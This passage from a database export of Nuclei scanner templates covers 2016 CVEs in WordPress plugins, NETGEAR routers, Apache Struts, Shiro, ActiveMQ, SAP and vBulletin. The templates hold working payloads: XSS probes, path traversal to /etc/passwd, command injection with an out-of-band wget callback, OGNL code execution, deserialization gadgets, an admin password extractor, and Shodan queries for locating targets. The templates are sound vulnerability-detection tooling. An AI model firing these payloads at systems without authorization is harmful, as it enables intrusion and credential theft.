CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-10973\n cwe-id: CWE-79\n epss-score: 0.00177\n epss-percentile: 0.54991\n cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: brafton\n product: brafton\n framework: wordpress\n tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"tab = alert(document.domain);\")'\n - 'contains(body_2, \"Brafton Article Loader\")'\n condition: and\n# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950", "hash": "d58dedd5515a600947037040b2c607cd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f96" }, "name": "CVE-2016-10993.yaml", "content": "id: CVE-2016-10993\n\ninfo:\n name: ScoreMe Theme - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability.\n reference:\n - https://www.vulnerability-lab.com/get_content.php?id=1808\n - https://wpvulndb.com/vulnerabilities/8431\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10993\n - https://github.com/0xkucing/CVE-2016-10993\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2016-10993\n cwe-id: CWE-79\n epss-score: 0.00245\n epss-percentile: 0.62591\n cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: scoreme_project\n product: scoreme\n framework: wordpress\n tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/scoreme/style'\n\n - method: GET\n path:\n - \"{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205a861ba8febc9300fb6d1aa1ed02ef760e621783766ea29d336f8ac3dd2e10e2022035d451e147d56cdaf09231f43635e84b6263c7e74ec48c0fa59272f97264a0a2:922c64590222798bb761d5b6d8e72950", "hash": "de3266558eba3ffdc0d197a2b151e20c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f97" }, "name": "CVE-2016-1555.yaml", "content": "id: 
CVE-2016-1555\n\ninfo:\n name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection\n author: gy741\n severity: critical\n description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1555\n - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic\n - http://seclists.org/fulldisclosure/2016/Feb/112\n - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-1555\n cwe-id: CWE-77\n epss-score: 0.97373\n epss-percentile: 0.99898\n cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: wnap320_firmware\n tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev\n\nhttp:\n - raw:\n - |\n POST /boardDataWW.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950", "hash": "e47ffd4c13e7dd83df318ecde3a3cbec", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307f98" }, "name": "CVE-2016-2389.yaml", "content": "id: CVE-2016-2389\n\ninfo:\n name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion\n author: daffainfo\n severity: high\n description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Apply the latest security patches and updates provided by SAP to mitigate the vulnerability.\n reference:\n - https://web.archive.org/web/20211209003818/https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/\n - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html\n - https://www.exploit-db.com/exploits/39837/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-2389\n - http://seclists.org/fulldisclosure/2016/May/40\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-2389\n cwe-id: CWE-22\n epss-score: 0.24589\n epss-percentile: 0.96217\n cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: netweaver\n shodan-query: http.favicon.hash:-266008933\n tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100c0981ae3808610bcc8a7e8ab312d25bcf72ea0bb9e117d81d415d2632ad6ad3e022100e803bbfa6008004d6a0443f4c9e37201bf5b214ac7106ebdd2b96672c45ea5df:922c64590222798bb761d5b6d8e72950", "hash": "9181d00d811e6844095ad5ec912e2d88", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f99" }, "name": "CVE-2016-3081.yaml", "content": "id: CVE-2016-3081\n\ninfo:\n name: Apache S2-032 Struts - Remote Code Execution\n author: dhiyaneshDK\n severity: high\n description: |\n Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).\n impact: |\n Remote code execution\n remediation: |\n Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1.\n reference:\n - https://cwiki.apache.org/confluence/display/WW/S2-032\n - https://struts.apache.org/docs/s2-032.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-3081\n - http://web.archive.org/web/20211207042547/https://securitytracker.com/id/1035665\n - http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2016-3081\n cwe-id: CWE-77\n epss-score: 0.97524\n epss-percentile: 0.99989\n cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve2016,cve,struts,rce,apache\n\nhttp:\n - raw:\n - |\n GET 
/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ac77a59d24373f8a33371c90c7e4275bd9cbd672278167a927b6b04d2066a1c4022100dc07b95c4a8afd4591d4fb49d9ac62d4cb34ac923b85398daa0a4e82aad7710d:922c64590222798bb761d5b6d8e72950", "hash": "4d18d45e398bfa1cf7a23fe5e7eff2a4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9a" }, "name": "CVE-2016-3088.yaml", "content": "id: CVE-2016-3088\n\ninfo:\n name: Apache ActiveMQ Fileserver - Arbitrary File Write\n author: fq_hsu\n severity: critical\n description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.\n impact: |\n An attacker can write arbitrary files on the server, potentially leading to remote code execution.\n remediation: |\n Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/40857\n - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30\n - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2016-3088\n - 
http://rhn.redhat.com/errata/RHSA-2016-2036.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-3088\n cwe-id: CWE-20\n epss-score: 0.83955\n epss-percentile: 0.98392\n cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: activemq\n tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive\nvariables:\n rand1: '{{rand_int(11111111, 99999999)}}'\n\nhttp:\n - raw:\n - |\n PUT /fileserver/{{randstr}}.txt HTTP/1.1\n Host: {{Hostname}}\n\n {{rand1}}\n - |\n GET /fileserver/{{randstr}}.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1==204\"\n - \"status_code_2==200\"\n - \"contains((body_2), '{{rand1}}')\"\n condition: and\n# digest: 490a0046304402206b7bd3e2e8e6558b6bd1ed2ed9786d1aa61b2f80c5153900102307acfbd8680302204f6528318fe66f51da0b6a08ecc218072d115dbdc42a066c07081d1a0dc1c58d:922c64590222798bb761d5b6d8e72950", "hash": "94e30c6c6317f5ee4da8baf54bf20393", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9b" }, "name": "CVE-2016-3978.yaml", "content": "id: CVE-2016-3978\n\ninfo:\n name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the \"redirect\" parameter to \"login.\"\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft.\n remediation: |\n Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability.\n reference:\n - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2016-3978\n - 
http://seclists.org/fulldisclosure/2016/Mar/68\n - http://www.securitytracker.com/id/1035332\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-3978\n cwe-id: CWE-79\n epss-score: 0.00217\n epss-percentile: 0.59667\n cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fortinet\n product: fortios\n tags: cve2016,cve,redirect,fortinet,fortios,seclists\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/login?redir=http://www.interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950", "hash": "87bff89ddb0f772563cc23794b9ca602", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9c" }, "name": "CVE-2016-4437.yaml", "content": "id: CVE-2016-4437\n\ninfo:\n name: Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: |\n Apache Shiro before 1.2.5, when a cipher key has not been configured for the \"remember me\" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.\n impact: |\n Remote code execution\n remediation: |\n Upgrade to a patched version of Apache Shiro\n reference:\n - https://github.com/Medicean/VulApps/tree/master/s/shiro/1\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437\n - http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html\n - http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html\n - 
http://rhn.redhat.com/errata/RHSA-2016-2035.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2016-4437\n cwe-id: CWE-284\n epss-score: 0.97507\n epss-percentile: 0.99981\n cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: shiro\n tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - dns\n# digest: 4b0a00483046022100fb046cc08189c3a3e20f44ffc1f443e657b070eae65463098ac3eb10d32969300221009acd50c19a5ec2239925b1ff303224e37e8b277b8b11b7f92b84141650cd97f8:922c64590222798bb761d5b6d8e72950", "hash": "a330434a780be0d022436539be427f8c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9d" }, "name": "CVE-2016-4975.yaml", "content": "id: CVE-2016-4975\n\ninfo:\n name: Apache mod_userdir CRLF injection\n author: melbadry9,nadino,xElkomy\n severity: medium\n description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.\n impact: |\n Successful exploitation of this vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and cache poisoning.\n remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.\n reference:\n - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975\n - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975\n - 
https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E\n - https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E\n - https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-4975\n cwe-id: CWE-93\n epss-score: 0.00399\n epss-percentile: 0.70799\n cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: http_server\n tags: cve2016,cve,crlf,apache,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)'\n# digest: 4a0a004730450220591243f64cba0b0c03d215d27b7a16783b2fbfb438d316dddf5577fd604ee4ed022100bf652b4a095563057b28cc33ac56040cc57495913b1ae8057328d07775384658:922c64590222798bb761d5b6d8e72950", "hash": "3f1ec192464e1728fb700ed898bfe32b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9e" }, "name": "CVE-2016-4977.yaml", "content": "id: CVE-2016-4977\n\ninfo:\n name: Spring Security OAuth2 Remote Command Execution\n author: princechaddha\n severity: high\n description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. 
When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.\n remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.\n reference:\n - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md\n - https://tanzu.vmware.com/security/cve-2016-4977\n - https://nvd.nist.gov/vuln/detail/CVE-2016-4977\n - https://pivotal.io/security/cve-2016-4977\n - http://www.openwall.com/lists/oss-security/2019/10/16/1\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2016-4977\n cwe-id: CWE-19\n epss-score: 0.03345\n epss-percentile: 0.91147\n cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: pivotal\n product: spring_security_oauth\n tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Unsupported response types: [978015547]\"\n\n - type: status\n status:\n - 400\n# digest: 4a0a00473045022100a996c40fae1f6d19435d135651a1168704634ae606188ed97fef12f4c8a2d3f6022016d0ce56e41a19dd65b863a46c1d4351dbf1e34b890044f16642401ec20f6b0a:922c64590222798bb761d5b6d8e72950", "hash": "087eae980400297a2b51d2b5acbc3dae", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9f" }, "name": "CVE-2016-5649.yaml", "content": "id: CVE-2016-5649\n\ninfo:\n 
name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure\n author: suman_kar\n severity: critical\n description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm', which discloses the administrator password and which a remote attacker can access without any authentication. The attacker can then use this password to gain administrator access to the targeted router's web interface.\n impact: |\n An attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.\n remediation: |\n Update the router firmware to the latest version, which includes a fix for the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2016-5649\n - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html\n - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-5649\n cwe-id: CWE-319,CWE-200\n epss-score: 0.17436\n epss-percentile: 0.95662\n cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: dgn2200_firmware\n tags: cve2016,cve,iot,netgear,router,packetstorm\n\nhttp:\n - raw:\n - |\n GET /BSW_cxttongr.htm HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Smart Wizard Result \"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: password\n group: 1\n regex:\n - 'Success \"([a-z]+)\"'\n part: body\n# digest: 
4b0a00483046022100b7aada274ac2abfee6b3697e0eda3050e81087c45c7ed3335655e3de2aecf912022100f066ed059d53b5052f87883ac4424f08d89de9cb66a856fe727c338c948f018f:922c64590222798bb761d5b6d8e72950", "hash": "af7c3600fe2f7c958d092dde73fef7bd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa0" }, "name": "CVE-2016-5674.yaml", "content": "id: CVE-2016-5674\n\ninfo:\n name: NUUO NVR camera `debugging_center_utils_.php` - Command Execution\n author: DhiyaneshDK\n severity: critical\n description: |\n __debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.\n reference:\n - http://www.kb.cert.org/vuls/id/856152\n - https://www.exploit-db.com/exploits/40200/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-5674\n cwe-id: CWE-20\n epss-score: 0.95705\n epss-percentile: 0.99378\n cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: netgear\n product: readynas_surveillance\n fofa-query: app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\"\n tags: cve,cve2016,nuuo,rce\n\nvariables:\n rand: \"{{to_lower(rand_text_alpha(32))}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id\"\n - \"{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 200\"\n - \"contains(body_1, 'Debugging Center')\"\n - \"regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)\"\n condition: and\n\n - type: dsl\n dsl:\n - \"status_code_2 == 200\"\n - \"contains(body_2, 'Debugging Center')\"\n - \"contains(body_2, 'Windows IP')\"\n condition: 
and\n# digest: 4a0a004730450220385c9c6da58edd672651a5e46895e146cc465ebca8ee3b813d44d6f616d0c378022100811021f1ae97e681a6f84ee297e881a5e855bfaa37a652ccc045f2cee6aa21b0:922c64590222798bb761d5b6d8e72950", "hash": "45b1b44f111657da288a2430b413fb23", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa1" }, "name": "CVE-2016-6195.yaml", "content": "id: CVE-2016-6195\n\ninfo:\n name: vBulletin <= 4.2.3 - SQL Injection\n author: MaStErChO\n severity: critical\n description: |\n vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.\n reference:\n - https://www.cvedetails.com/cve/CVE-2016-6195/\n - https://www.exploit-db.com/exploits/38489\n - https://enumerated.wordpress.com/2016/07/11/1/\n - http://www.vbulletin.org/forum/showthread.php?t=322848\n - https://github.com/drewlong/vbully\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-6195\n cwe-id: CWE-89\n epss-score: 0.00284\n epss-percentile: 0.68042\n cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 6\n vendor: vbulletin\n product: vbulletin\n shodan-query: title:\"Powered By vBulletin\"\n tags: cve2016,cve,vbulletin,sqli,forum,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - 
\"{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"type=dberror\"\n\n - type: status\n status:\n - 200\n - 503\n condition: or\n# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950", "hash": "2afe811b10e1d1f03b5ff63c7d67585e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa2" }, "name": "CVE-2016-6277.yaml", "content": "id: CVE-2016-6277\n\ninfo:\n name: NETGEAR Routers - Remote Code Execution\n author: pikpikcu\n severity: high\n description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to unauthorized access, data theft, or network compromise.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-6277\n - 
